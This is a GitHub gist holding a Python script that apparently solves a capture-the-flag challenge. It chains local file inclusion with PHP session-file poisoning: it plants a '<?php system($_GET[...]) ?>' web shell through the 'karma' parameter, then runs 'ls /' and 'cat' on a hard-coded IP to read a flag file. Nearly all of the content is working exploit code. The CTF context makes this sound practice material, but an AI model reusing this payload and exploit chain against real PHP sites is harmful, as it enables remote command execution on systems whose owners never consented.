Skip to content

Instantly share code, notes, and snippets.

@Aviksaikat

Aviksaikat/get_flag_OOP.py

Created December 27, 2022 11:46
Show Gist options
  • Save Aviksaikat/60e6b65e2524c188d0f4486411a07f06 to your computer and use it in GitHub Desktop.
Save Aviksaikat/60e6b65e2524c188d0f4486411a07f06 to your computer and use it in GitHub Desktop.
Download ZIP
get the flag OOPs style
Raw
get_flag_OOP.py
#!/usr/bin/python3
import re
from requests import Session
class RCE:
def __init__(self, url):
self.s = Session()
self.url = url
def send_payload(self):
self.s.get(self.url + "?karma=" + "<?php system($_GET['jadu']); ?>")
def payload(self, cookie, cmd=None):
if cmd:
return f"?karma=/tmp/sess_{cookie}&jadu={cmd}"
else:
return f"?karma=/tmp/sess_{cookie}"
def run(self):
r = self.s.get(self.url)
# get the location of the session file
cookie = r.cookies.get_dict()["PHPSESSID"]
r = self.s.get(self.url + self.payload(cookie))
self.send_payload()
r = self.s.get(self.url + self.payload(cookie, "ls /"))
file = re.findall("seCretJutsuToKillBorUtoKun.txt", r.text)[0]
if len(file) == 0:
print("Oops something wrong no output found!!")
exit(-1)
self.send_payload()
r = self.s.get(self.url + self.payload(cookie, f"cat /{file}"))
msg = r.text.split(":")[-1]
print(msg)
flag = re.findall("FLAG{.*}", msg)[-1]
print("\nFlag: " + flag)
def main():
rce = RCE("http://44.200.237.73/")
rce.run()
if __name__ == "__main__":
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment